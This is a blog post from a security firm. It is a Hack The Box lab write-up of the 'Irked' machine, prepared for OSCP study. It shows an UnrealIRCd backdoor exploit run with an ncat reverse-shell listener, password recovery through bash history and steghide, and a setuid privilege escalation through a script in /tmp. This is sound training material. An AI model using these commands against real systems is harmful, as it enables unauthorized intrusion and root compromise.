Road to OSCP - Hack The Box Write Up - Irked

Blog

2
- May
2019
Posted by: Ángel Guzmán
[Cybersecurity & hacking tools and techniques]
Road to OSCP - Hack The Box Write Up - Irked

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Irked

Initial Foothold

After enumerating *all+ ports we see that there is an IRC server: unrealIRCd.

We do not know the version, but we can still try to exploit it. There is backdoor for version 3.2.8.1. We can use this script to exploit it:

  1. Inside the script, set the local IP and port.
  2. Set up the listener: ncat -lnvp 6969.
  3. Launch the exploit: python3 exploit.py 10.10.10.117 6697 -payload python.

We get a shell as ircd.

User

We can look at /home/ircd/.bash_history (truncated output):

cd /var/www/html
ls
cd /tmp
sudo -i
cd /home/ircd
clear
ls
ls -lah
cd ..
ls
cd djmardov
ls
cd Documents
ls -lah
cat .backup
clear
exit

A file called .backup, very suspicious. Found it, /home/djmardov/Documents/.backup:

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

We have a password: UPupDOWNdownLRlrBAbaSSss. Since it says steg, I think it will be the steghide password for the image found on the website.

I was right:

  1. Download image: wget http://10.10.10.117/irked.jpg.
  2. Extract hidden file: steghide extract -sf irked.jpg.

We get a file called pass.txt with the following contents: Kab6h+m+bbp2J:HG, which looks like a password. We can use it to SSH as user djmardov: ssh djmardov@10.10.10.117

Root

There is suspicious setuid file: /usr/bin/viewuser. When running it, it looks for a file called /tmp/listusers.

If we create the file, it complains with this error: sh: 1: /tmp/listusers: Permission denied. It looks like it is trying to execute the file with /bin/sh.

So, if we just write the following lines to the file /tmp/listusers:

#!/bin/bash
bash

Then do chmod +x /tmp/listusers and run the binary viewport, we get a shell as root.

tags
Ángel Guzmán/Junior evaluator

Degree and Master in telecommunications by the University of Granada, specialized in telematics. Joined jtsec in November of 2019 as a Junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training about the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.


Contact

Send us your questions or suggestions!

By sending your data you allow us to use it to resolve your doubts by sending you commercial information of interest. We will delete it when they are no longer necessary for this matter. Know your rights in our Privacy Policy.
RECENT POSTS
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
Jan 17, 2025
jtsec achieves pioneering accreditation for MEMeC cryptologic evaluation
jtsec & Applus+ Laboratories at ICCC24
Nov 14, 2024
jtsec & Applus+ Laboratories at ICCC24
How to use the CCN product catalog to improve your company's security
Oct 14, 2024
How to use the CCN product catalog to improve your company's security
Common Criteria Statistics 2023
June 17, 2024
Common Criteria Statistics 2023
How to enter ENS category high, stay in the catalog and add new versions of my product
April 23, 2024
How to enter ENS category high, stay in the catalog and add new versions of my product
jtsec - Our LINCE 2023
Febr 6, 2024
jtsec - Our LINCE 2023
We wish you a happy and cybersecure 2024
Dec 19, 2023
We wish you a happy and cybersecure 2024
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
Dec 14, 2023
How to Prepare Your Products and Services for the Quantum Era and Ensure Their Certification?
How to include your product or service in ENS ALTA.
Oct 31, 2023
How to include your product or service in ENS ALTA.
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
Sept 19, 2023
Certifications and cybersecurity methodologies are generating interest among companies and organizations at both the national and international levels.
CATEGORIES